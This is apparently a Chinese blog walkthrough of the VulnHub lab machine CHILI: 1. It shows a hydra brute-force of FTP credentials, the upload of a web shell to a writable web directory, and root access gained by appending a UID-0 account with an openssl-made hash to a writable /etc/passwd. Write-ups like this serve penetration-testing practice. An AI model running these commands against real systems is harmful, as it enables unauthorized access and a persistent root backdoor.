VulnHub靶场之CHILI: 1

VulnHub靶场之CHILI: 1

扫描IP以及端口:
VulnHub靶场之CHILI: 1
访问80端口,一个小辣椒,目录扫描,啥都没有,只能从ftp下手了:
VulnHub靶场之CHILI: 1
看了看hint,用chili当作用户名试试破解一下密码:
VulnHub靶场之CHILI: 1
利用hydra破解ftp密码:

hydra -l chili -P /usr/share/wordlists/rockyou.txt -f -V ftp://192.168.198.150

得到密码:
VulnHub靶场之CHILI: 1

成功进入:
VulnHub靶场之CHILI: 1
进入到/var/www/html下,.nano下可读可写:
VulnHub靶场之CHILI: 1
上传shell文件,别忘了加权限chmod 777:
VulnHub靶场之CHILI: 1
访问,监听:
VulnHub靶场之CHILI: 1
就一个用户chili,,,内核也较新:
VulnHub靶场之CHILI: 1
发现passwd可以写入:
VulnHub靶场之CHILI: 1
直接利用kali的工具openssl:

openssl passwd -1 -salt shell 123

VulnHub靶场之CHILI: 1
写入到passwd:

echo 'shell:$1$shell$5TvJA7y/9faSDWR84IKgZ/:0:0::/root:/bin/bash'>>/etc/passwd

VulnHub靶场之CHILI: 1
成功获取root权限,读取flag:
VulnHub靶场之CHILI: 1

上一篇:VulnHub Five86-1 靶机渗透


下一篇:Vulnhub实战靶场:DC-2